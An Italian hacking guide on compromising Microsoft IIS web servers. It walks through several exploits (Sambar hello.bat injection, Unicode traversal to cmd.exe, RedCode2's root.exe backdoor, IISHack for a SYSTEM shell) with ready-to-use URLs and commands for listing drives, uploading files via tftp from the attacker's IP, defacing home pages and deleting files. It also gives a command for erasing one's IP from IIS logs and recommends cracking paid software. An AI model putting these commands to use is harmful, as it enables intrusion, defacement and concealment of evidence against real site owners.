COme bucare un server iis
Indice:
1 Intro
1.1 Premessa
1.2 Crediti
1.3 Disclaimer
1.4 Versione Guida
2 Exploit:
2.1 Sambar
2.2 Unicode
2.3 Red Code 2
2.4 IISHack1.5
2.5 Hacking avanzato
3 Log
4 Gr33tz/Fuck
1.1 Premessa
Questa guida è nata dopo varie perplessità sulla pubblicazione così esplicita di tali informazioni, per alcuni possono essere cose già studiate per altri può essere una vera e propria spiegazione su come "bucare server". All’inizio non volevamo pubblicare tali informazioni così esplicite per non attirare newbie/lamer nel commettere vere e proprie "illegalità" però l’underground italiano deve crescere e senza la nascita di tali documenti resteremo sempre indietro rispetto agli altri paesi. Noi, nel nostro piccolo, vogliamo che l’Italia sia un paese competente in un campo dove l’America e il Brasile dominano: l'hacking.
1.2 Crediti
Autori:
- Cookbooker
- FeltonSpray
Le varie informazioni riportate in questo testo sono state studiate da altri manuali e da exploit quindi ringraziamo i vari autori dove dai loro testi abbiamo approfondito le nostre conoscenze e da dove estrapoliamo qualche pezzo per inserirlo in questo manuale. Ringraziamo anche i vari autori degli exploit che verranno allegati a questo testo quindi grazie a:
MightyInquisitor - mightyinquisitor@libero.it - https://mightyinquisitor.cjb.net
Homepack - Homepack@libero.it - www.newbieteam.f2s.com
COOKBOOKER - cookbooker@libero.it - www.umcrew.com
Gli altri creatori degli exploit che abbiamo scaricato da internet (scusate se non sappiamo i vostri nick ;P) meritano un profondo ringraziamento per le loro competenze dimostrate nella scoperta dell’exploit, complimenti di cuore!
1.3 Disclaimer
Le informazioni contenute in questa guida sono a puro scopo informativo e non vogliono in alcun modo stimolare violazioni della legge. Ne gli autori dei vari testi, ne i creatori degli exploit, ne chi deciderà di ospitare questo testo nel proprio sito, saranno responsabili dell'uso che i lettori faranno di queste informazioni.
2 Exploit
Come ben sappiamo i programmi che molto spesso usiamo vengono compilati, sia per svista sia per non profonda competenza in materia, contengono degli errori che possono essere sfruttati per far eseguire al programma dei comandi "arbitrari".
Gli exploit vengono scoperti da persone molto competenti che ricercano errori nel codice sorgente di un programma e ne compilano del codice (c, perl, ecc.) che una volta eseguito può far compiere al programma diverse operazioni "strane" ;).
Ricordate di leggere fino in fondo questo testo perché quando eseguite un exploit quasi sempre resta nei log il vostro ip e la data dell’operazione, quindi prima di fare cazzate leggete attentamente questa guida.
Dove trovare exploit e info:
www.packetstormsecurity.org
www.ussrback.com
www.umcrew.com
www.hack.co.za
www.bismark.it [ospita mirror di hack.co.za]
www.eeye.com
2.1 Sambar
[Sistemi vulnerabili: Sambar Web/FTP Server]
[Exploit: Sambar]
[Vulnerabilità]
Il sambar è un server sia WEB che FTP che contiene un’Api programmabile fino ai minimi dettagli, con il suo linguaggio di scripting è possibile realizzare pagine dinamiche html. Per maggiori informazioni: www.sambar.com .
L’errore del sambar che noi sfruttiamo sta in un file BATCH che viene installato nella directory /cgi-bin/. Il contenuto del file è riportato qui sotto:
@echo off
echo Hello world
se noi andiamo a richiamare dal web il file
www.microsoft.com/cgi-bin/hello.bat (ovviamente è un sito preso a caso :Þ)
Se il server è exploitabile a questo bug verrà riportata come pagina solo la scritta "Hello World" se invece ci da come pagina la solita "impossibile visualizzare la pagina web" mettete da parte l’exploit del sambar e andate avanti ;-)
Mettiamo caso che il server è vulnerabile, possiamo far passare attraverso il sambar delle chiamate un po’ "strane" la più semplice è visualizzare il contenuto del drive C:
https://www.microsoft.com/cgi-bin/hello.bat?&dir+c:\
Quindi attraverso il sambar diciamo di compiere questa operazione e sul nostro browser apparire il contenuto dell'unità C. Adesso possiamo immaginare ciò che possiamo eseguire, guardare i contenuti, modificare, cancellare ecc basta solo che conosciate i comandi "dos".
Il nostro scopo potrebbe essere:
1) Conserviamo l’accesso al sistema
2) Creiamo un file di testo e spieghiamo come siamo entrati
3) Defacciamo il sito
Cominciamo ad optare per le scelte:
a) Scelta non molto logica, non ci resta una shell ma solo l’accesso a qualche dato di poco conto visto che i server afflitti da questo bug sono pochi.
b) Scelta normale, infondo vogliamo diventare hacker quindi...
c) Scelta che io preferisco accoppiare al file di testo, per me il defaced è la maniera più bruta di far capire al SYS ADMIN che deve studiare...
Dopo tutto ciò spiego sia come creare un file di testo che come defacciare, è quasi identico soltanto che per defacciare bisogna perderci più tempo.
www.microsoft.com/cgi-bin/hello.bat?&echo+server+afflitto+dal+bug+sambar+consiglio+di+cancellare+il+file+hello.bat+e stai+al+sicuro+ZioBill:+fixa+la tua ignoranza+e+ricorda+che+Feltonspray+ti+ha+bucato+il+server>c:\dir\hacked.txt
Oppure come volete voi basta che al posto degli spazi mettete "+" una volta dato invio verrà creato un file del nome che avete dato contenente ciò che avete scritto. Adesso credo che non sia difficile capire come si fa il defaced :-) però dovete trovare la giusta WEB ROOT in genere c:\InetPub\wwwroot ma molto spesso cambia, provate altri drive come D E F G H ecc la pagina iniziale potrebbe avere questi nomi:
index.htm
index.html
index.asp
default.htm
default.html
default.asp
home.htm
[Patch: basta eliminare il file hello.bat da /cgi-bin/]
2.2 Unicode
[Sistemi vulnerabili: Windows NT con IIS 2-3-4-5]
[Exploit: unitools, uni1.pl, uni2.pl, uni3.pl, check.pl ]
[Vulnerabilità]
il bug del unicode è un bug nella serie di caratteri di UNICODE che è installata con
IIS2.0/5.0 che funziona solitamente su NT4/Win2k rispettivamente. La cosa "divertente" con unicode, è che l' exploit differisce per ogni serie di caratteri di UNICODE. Per esempio, se state utilizzando un server di IIS che è in cinese (cn), quindi sta usando una serie di caratteri differente di UNICODE ai sistemi inglesi (del uk). E così l' exploit è differente secondo la serie di caratteri di UNICODE nell'uso.
Potete usare questo bug in tre modi, direttamente da browser (cosa che vi sconsiglio) oppure dal prompt di ms-dos o, scelta consigliata, da shell.
Ma dato che l’exploit da consoll è più immediato spiego per lì :-)
Per testare la vulnerabilità di un server dovete usare il file "check.pl" per utilizzarlo dovete ovviamente avere instalato "ActivePerl" ( www.activeperl.com ).
Invece per i linuxiani basta solo usare il comando
Perl check.pl www.microsoft.com:80
Il programma esegue un test e alla fine dopo pochissimo vi dice:
Salvo
Buchiamolo
Ovviamente se dice salvo cambiate exploit se dice Buchiamolo eseguite i comandi riportati qui:
la scelta poi cade su 3 file: uni1.pl uni2.pl uni3.pl la differenza c’è e la spiego dopo
Adesso vale anche per i windowsiani perché una volta installato active perl anche per voi basta scrivere perl.....
Perl uni1.pl www.microsoft.com:80 dir+c:\
Abbiamo usato il uni1.pl perché è il più veloce a far osservare i dati,a questo punto ci sono due possibilità:
O vi dice errore di ecc ecc ecc
O vi elenca i vari file
se vi da errore lasciate perdere unicode e provatene un altro! Se invece vi da le cartelle per adesso va tutto bene basta solo che conosciate i comandi dos.
Adesso entra di nuovo il fattore delle scelte in base a ciò che vogliamo fare:
1) Conserviamo l’accesso al sistema
2) Creiamo un file di testo e spieghiamo come siamo entrati
4) Defacciamo il sito
a) Consiglio di si visto che tantissimi server sono afflitti da sto bug
b) Se non vi fate niente del server, create il file spiegando come siete entrati e basta poi uscite :-)
c) Siiii Defacciamo!!!!! :-) come ben sapete io scelgo le due opzioni Creo il testo e defaccio ma il bello con l’unicode è che abbiamo un’arma molto più potente anzi due: unicodeloader.pl oppure il tftp (consiglio unicodeloader dopo spiego meglio!).
Spieghiamo come creare il file di testo oppure come defacciare (approfondito)
Per creare il file di testo, mettiamo in c, dobbiamo scrivere:
perl uni2.pl(°) www.microsoft.com:80 "echo+OWNED+BY+ETCC > c:\hacked.txt"
· non lo dovete scrivere quando date il comando è solo una mia nota per farvi capire che adesso usiamo il 2 di uni perchè è molto + potente ed è sicuro che compie il lavoro (?).
Defacciamento
Qui il discorso diventa più tecnico e più serio con grandi soddisfazioni nel suo risultato (sono sempre commosso quando defaccio un IIS visto il tempo perso nel creare qualcosa che farà ricordare di me e la mia grande soddisfazione di riuscita, alla fine di tutto nelle conclusioni spiegherò il mio concetto di defaced).
Come al solito è importantissimo trovare la webroot, noterete che nei server dove entrerete trovate spesso in ogni parte le pagine index.htm e default.htm, e anche diverse cartelle come inetpub in più drive con un po’ di ricerca si capisce qual è la giusta posizione della webroot quindi è solo questione di pratica. Adesso che avete trovato la sua giusta ubicazione avete due scelte:
Fare un defaced scrivendo solo hacked by VostroNick
Fare un defaced cambiando tutta la home page cosi da aggiungere immagini scritte colorate suoni effeti dhtml anche creazioni flash insomma tutto cio che volete.
Sono sicuro che scegliete la seconda opzione (hehe) ma le spiego tutte e due:
Per fare il defaced normale basta che scriviate
Perl uni2.pl www.microsoft.com:80 "echo+OWNED+By+ecc > x:\webroot\index(?)"
Adesso ho saltato due cose che spiego qui:
x:\ lo dovete sostituire con il vero drive
index(?) lo dovete sostituire con il vero nome della prima pagine sia home che index o default l’estenzione non l’ho scritta neanche perché dipende se è htm, html o asp.
Es: c:\inetpub\wwwroot\default.htm
Adesso spieghiamo un’altro pacchetto exploit unitools. Estraiamo i file
Upload.asp
Upload.inc
Unicodexecute3.pl
Unicodeloader.pl
Mettiamo tutto in c:\perl\bin ritorniamo nel nostro prompt di ms-dos (consoll per i linuxiani) e lanciamo il comando
Perl unicodeloader.pl www.microsoft.com:80 webroot
La webroot dobbiamo vedere qual’è ad esempio d:\inetpub\wwwroot
Una volta eseguito il comando comincia la fase di uploading ed automaticamente vengono inviati al server i file upload.asp ed upload.inc (ovviamente un po’ ci mette) appena sono arrivati scrivete nel vostro browser:
https://www.microsoft.com/upload.asp
e si aprirà magicamente una pagina che vi invita ad inviare file al server (uahaha) quindi come già avete capito potete inviare ciò che volete naturalmente noi ci prepariamo una nostra paginetta fatta con un programma tutta spettacolo (hehe) facciamo le modifiche solo nel campo immagine dove vi dice il sorgente da dell’immagine al posto di lasciare che ne so c:\immagini\foto.jpg scrivetegli
https://www.microsoft.com/foto.jpg fatto ciò uploadate la pagina e le varie immagini ovviamente alla pagina date il nome della pagine che è online (index,default).
Errori frequenti:
Ad esempio mentre state sovrascrivendo un file o anche rinonimando non ve lo esegue e li potete anche non pensare + al defaced ma solo per avere informazioni riservate del server. Comunque quando eseguite uni1.pl uni2.pl uni3.pl in qualche azione del tipo rinomina o sovrascrivi o crea, vi da tanti errori non ci fate caso esegue lo stesso le operazioni per esserne più sicuri fate un dir di nuovo e vedete che lo spazio del file diminuisce nettamente :-).
TFTP
Eccoci qui a spiegare una tecnica che può farvi uploadare file verso il server, anche se in modo
un pò più rischioso, useremo un programma che si chiama Tftp pro suite che lo potete scaricare
direttamente da www.download.com e scaricarvi anche il crack visto che è un programma a pagamento
ovviamente andremo su astalavista.box.sk :) Una volta installato e crakkato dovete andare nelle
propietà ed inserire come path la directory dove sono contenuti i file che vorreste inviare
al server (consiglio di creare una cartella apposita cosi da non dover cambiare continuemente path).
Aprite il server sul vostro pc e prendetevi un caffè :P
Adesso andiamo nel nostro browser e scriviamo:
https://www.microsoft.com/directory/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20tftp%20-i%20200.200.200.200%20get%20c:\windows\calc.exe%20c:\winnt\system32\calc.exe
Spiego il tutto sennò uscite pazzi hehehe:
https://www.microsoft.com è il server in cui vogliamo uppare la pagine.
/directory/ dovete usare una delle directory dove è possibile exploittare il cmd.exe oppure potete lavorare con un exploit tipo l'unicode (dopo spiego in dettaglio.
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20 HEeheheh :)
tftp%20-i%20200.200.200.200 il 200.200.200.200 dovete sostituirlo con il vostro ip!
get%20c:\windows\calc.exe ovviamente imponiamo di mandare il file contenuto in c:\windows\calc.exe (voi dite se posso uppare dalla cartella che voglio perchè mi hai fatto impostare la path? Hehe spiegherò dopo :P)
%20c:\winnt\system32\calc.exe è la cartella dove volete che finisca il file (ma se uploadavo default.htm e la sistemavo in intetpub/wwwroot che succedeva? uahahahah)
%20 per i più lamer è il esadecimale lo spazio per separare le parole...
Adesso spieghiamo come è possibile usare questo metodo con altri exploit:
Prendiamo in considerazione l'unicode, mettiamo caso che con l'unitool non riusciamo ad uploadare default.asp, non possiamo defacciare cambiando tutta la pagina quindi cosa facciamo?
usiamo il tftp :P però notiamo che le varie cartelle non possono essere sfruttate per uscirci il cmd.exe quindi che facciamo? Usiamo l'unicode per attivare il tftp Uahahah
allora come al solito attiviamo la parte server sul nostro pc controllando la path adesso andiamo nel server vittima e scriviamo da MS-dos:
perl unicodeexecute2.pl www.microsoft.com:80 tftp -i MioIP c:\path
heehhe adesso lo spiego meglio
perl unicodeexecute2.pl www.microsoft.com:80 non credo ve lo debba spiegare sennò chiudete sto testo e leggetevi il CIOE' uahahah
tftp è il programma :)
-i l'opzione che serve a noi :)
Mio Ip chissà che vorra dire... uahaha
c:\path bisogna scrivere il percorso che abbiamo messo nella path insieme al file che vogliamo mettiamo caso nella cartella creata e che abbiamo dichiarato come path è contenuto il file default.htm scriviamo
c:\hacker\default.htm
Una volta che lo avete inviato con l'unicodexecute2 spostatevi il file fino al wwwroot :-)
[Patch: https://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787]
2.3 RedCode2
[Sistemi vulnerabili: Windows NT 4/5 con IIS 4/5]
[Exploit: RedCodeLoader (www.umcrew.com)]
[Vulnerabilità]
Il worm noto come RedCode2, che sfrutta come il precedente una vulnerabilità di IIS 4 e 5 per diffondersi, svolge nella macchina infetta le seguenti azioni:
1) crea una copia di se col nome "explorer.exe" in C e D;
2) condivide via web le unità C e D;
3) copia "cmd.exe" col nome di "root.exe" nelle directory "msadc" e "scripts";
4) segue una ricerca di altri server vulnerabili da infettare.
A noi interessa il terzo punto.
L'unicode bug ci permetteva di risalire le directory del server fino ad arrivare al file "cmd.exe" contenuto nella cartella System32 consentendoci così di eseguire qualunque comando dos in remoto. In un computer infetto dal RedCode2 non servono strambi codici (tipo "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c") per accedere a "cmd.exe" dato che è stato copiato col nome "root.exe" nella cartella "scripts" o nella cartella "msadc". Per eseguire dei comandi dos in remoto basterà quindi visitare da browser (mi raccomando: usate qualche proxy!) il seguente url:
https://www.vittima.com/scripts/root.exe?/c
o
https://www.vittima.com/msadc/root.exe?/c
L'utilizzo di questo exploit è lo stesso dell'unicode.
Esempi:
https://www.vittima.com/scripts/root.exe?/c dir c:\ [ vi verrà mostrato il contenuto di C ]
https://www.vittima.com//scripts/root.exe?/c echo Hacked+by+COOKBOOKER> c:\inetpub\dir_sito\index.htm [ creerà un file index.htm con scritto "Hacked by COOKBOOKER" nella cartella "c:\inetpub\dir_sito" ]
https://www.vittima.com//scripts/root.exe?/c del c:\wbill.txt [ questo comando cancella un ipotetico file "wbill.txt" (MOLTO ipotetico... chi scriverà mai "Viva Bill"? ;o))]
https://www.vittima.com//scripts/root.exe?/c type c:\wbill.txt [ il comando "type" ci permette di leggere il contenuto del solito ipotetico file "wbill.txt" ]
[Exploit]
Un adattamento fatto da me dell'unicodeloader per il RedCode2 è reperibile in https://umcrew.supereva.it ;o)
Il RedCodeLoader vi permetterà di uploadare file in un server infetto.
Esempio:
perl redcodeloader.pl www.server.com:80 'c:\inetpub\wwwroot\'
Questo comando uploaderà un file upload.asp e upload.inc nella cartella c:\inetpub\wwwroot\ (che di default contiene il sito). Ora ci basterà visitare www.server.com/upload.asp per avere a disposizione un form che ci permetterà di uploadare qualunque file nel server. :o)
[ Patch: https://www.microsoft.com/technet/security/bulletin/MS01-033.asp ]
2.6 IISHack
[Sistemi vulnerabili: Windows NT 4.0 IIS 4.0 con sp6]
[Exploit: IISHack 1.5 (https://www.eeye.com/html/advisories/IISHack1.5.zip)]
[Vulnerabilità]
Questo exploit in C sfrutta un buffer overflow in inetinfo.exe e l'unicode bug per farci eseguire dei comandi come SYSTEM. Cerchiamo di capire come funziona.
L'Unicode Bug usato da solo ci permette di eseguire dei comandi in remoto come IUSR_MACHINE, ma se noi lo usiamo per sfruttare il buffer overflow prima citato (exploit normalmente locale) guadagneremo accesso come SYSTEM! 8o]
[Exploit]
L'IISHack creerà una shell DOS su una porta a nostro piacere.
C:\>IISHack1.5.exe
IISHack Version 1.5
eEye Digital Security
https://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Usage: IISHack1.5 [server] [server-port] [trojan-port]
Esempio:
IISHack1.5.exe www.server.com 80 1717
IISHack Version 1.5
eEye Digital Security
https://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.server.com on port 1717 and you
should get a cmd prompt.
Ora ci connettiamo con telnet al server sulla porta definita (1717 in questo caso) ed avremo a nostra disposizione un Prompt dei comandi:
C:\> telnet www.server.com 1717
Trying www.server.com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp
2.7 Hacking avanzato
Adesso è il momento di fare qualcosa di più raffinato e professionale, ora saremo
noi a trovare qualche bug e sfruttarlo. le directory dove possono risiedere bug
solitamente sono:
/scripts - /cgi-bin - /wwwroot - /_vti_bin - /IISADMPWD - /msadc
Adesso l'exploit che useremo sarà html, quindi codici da aggiungere nel normale indirizzo
URL e vedere se il bug si trova in una delle cartelle esempio:
https://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\
In questa stringa andiamo a richiamare nella cartella /cgi-bin una chiamata verso il cmd.exe che si trova in /winnt/system32 e gli
imponiamo di eseguire un dir, se tutto va a buon fine nell'output del browser vi arriva il contenuto del drive "C".
Se invece non otteniete niente cambiate cartella al posto di mettere /cgi-bin/ ne mettete una di quelle sopra citate.
Fate molta attenzione a ciò che bucate, ovviamente se un server non gira con IIS ma con APACHE cambiate vittima :) oppure provate a cercare qualche exploit per il web server (credo che continueremo a fare altre guide per l'hacking di linux).
Spieghiamo bene perchè ho chiamato Hacking Avanzato questo capitolo, qui non è un semplice exploit da usare ma una vera e propia ricerca dentro le varie cartelle del server per trovare un bug, il lavoro qui sarà più lungo perchè qui siete voi a cercare e sfruttare il bug.
Adesso spiego anche come fare per creare file o defacciare:
Per creare file basta scrivere:
https://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20FELTONSPRAY+TI+HA+BUCATO+IL+SERVER+ZIO+BILL+AUAUAAHHA>%20billFuck.txt
ehehe e magicamente si crea il file contenente cio che volete :)
Adesso un comando un po lamah :-)
https://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\billFuck.txt
se al posto di mettere il nome del testo sopra creato mettiamo l'autoexec.bat che succede? :-) uahahahah
Fatene buon uso di questo comando evitate di cancellare file...
Adesso se volete defacciare la index, scrivete:
https://www.microsoft.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20FELTONSPRAY+TI+HA+BUCATO+IL+SERVER+ZIO+BILL+AUAUAAHHA>%20c:\inetpub\wwwroot\index.htm
ricordate di fare attenzione alla web root sennò defacciate qualche altra pagina :-)
3 LOG
Gli avvenimenti riguardanti il web server IIS (e il server FTP) vengono normalmente LOGgati da "inetinfo.exe" nella directory "WinDir\System32\LogFiles".
Un esempio di file di LOG è il seguente:
192.168.0.1, -, 10/20/00, 0:28:56, W3SVC23, ORCHID, 209.236.24.166, 187, 375, 2852, 200, 0, GET, /images/logo.gif, -,
192.168.0.1, -, 10/20/00, 0:29:14, W3SVC23, ORCHID, 209.236.24.166, 0, 371, 2852, 200, 0, GET, /images/logo.gif, -,
192.168.0.2, -, 10/20/00, 2:20:47, W3SVC23, ORCHID, 209.236.24.166, 0, 497, 315, 403, 5, GET, /, -,
192.168.0.3, -, 10/20/00, 6:24:53, W3SVC23, ORCHID, 209.236.24.166, 0, 265, 334, 403, 5, GET, /, -,
192.168.0.1, -, 10/20/00, 7:27:19, W3SVC23, ORCHID, 209.236.24.166, 15, 373, 318, 302, 0, GET, /extreme/enter/, -,
192.168.0.1, -, 10/20/00, 7:27:19, W3SVC23, ORCHID, 209.236.24.166, 125, 374, 334, 403, 5, GET, /extreme/enter/, -,
Facciamo finta che il file sopra riportato contenga il nostro IP (per esempio 192.168.0.1), poniamo caso che il file si chiami in000732.log e sia contenuto nella cartella W3SVC3 in LogFiles "c:\WINNT\System32\W3SVC3\in000732.log", ci basterà eseguire il comando sotto riportato per cancellare le nostre tracce:
type c:\WINNT\System32\W3SVC3\in000732.log | find /V "192.168.0.1" > temp | del c:\WINNT\System32\W3SVC3\in000732.log | move temp c:\WINNT\System32\W3SVC3\in000732.log
Questa serie di comandi, a cui basterà sostituire le "variabili" che indicano File e IP per adattare ad ogni occasione, compie le seguenti azioni:
1) visualizza il contenuto del file (attraverso il comando 'type');
2) cerca e cancella le righe contenenti il vostro IP ('find /V "192.168.0.1"');
3) tiene in memoria il file "filtrato" (' > temp');
4) cancella il vekkio file ('del');
5) sostituisce il vekkio file con quello temporaneo privo delle nostre tracce ('move temp ...');
Facile, no? Peccato che abbiamo trascurato un "piccolo particolare"... "il file è usato da Windows" (dal sopra citato "inetinfo.exe")! :o\ Ma nn preokkupatevi, basterà, infatti, killare "inetinfo.exe" per "liberare" il file di LOG (per farlo dovete avere accesso come Administrator, nella prossima versione di questa guida spiegheremo l'uso dell'exploit delle estensioni .printer ISAPI... pazientate! :o)). Come? Dovrete usare "pslist.exe" per ottenere la lista dei processi e trovare quello di "inetinfo.exe" e, successivamente, killarlo usando pskill.exe. Ora potete scrivere liberamente sui file di LOG ma ricordatevi di riavviare InetInfo ("c:\WINNT\SYSTEM32\inetsrv\inetinfo.exe") al termine dell'operazione!
I file pslist.exe e pskill.exe sono reperibili su https://umcrew.supereva.it ;o)
Con questa breve guida all'occultamento delle vostre tracce finisce questa prima versione della "Grande Guida all'hacking di IIS", concludo sperando che questo testo nn abbia semplicemente insegnato al lamer di turno altri modi per rompere i coglioni alla gente ma sperando che abbia alimentato la curiosità e l'interesse del lettore nell'ambito della sicurezza informatica. Cook.
5 Gr33tz/Fuck
[C00Kß003R]
Cookbooker saluta e ringrazia: Ulisses1, TheFireAngel, Jweb, Rhost, Cujo, Kewl, Kekk0, Faladi e tutti i membri Dell'UMCrew.
Cookbooker fotte: chi cerca di decidere per lui, i falsi (falsi anticonformisti o
false bionde che siano), quelli che mi copiano umcrew.com :o\, Telecom (ci metti troppo
sale nelle bollette! :P), la GdF (smettetela di romperci il cazzo), NightNavigator
(nn c'era più spazio nei ringraziamenti... accontentati! :o)), il Berlusca (o
rmai nei miei fuck ti senti di casa, eh? ;]) e Reload.
[F3LT0N$¶RAI]
Gr33tz: CrimeLordz, BHS, tty0, RaulKen, Newbie Team, TankCommandos, All Defaced_Team, Safemode, LoginMatrix
Fuck: Spippolatori, Bush, USA Governament, Italian Governament, Guardia Di Finanza (sempre a rompere le balle).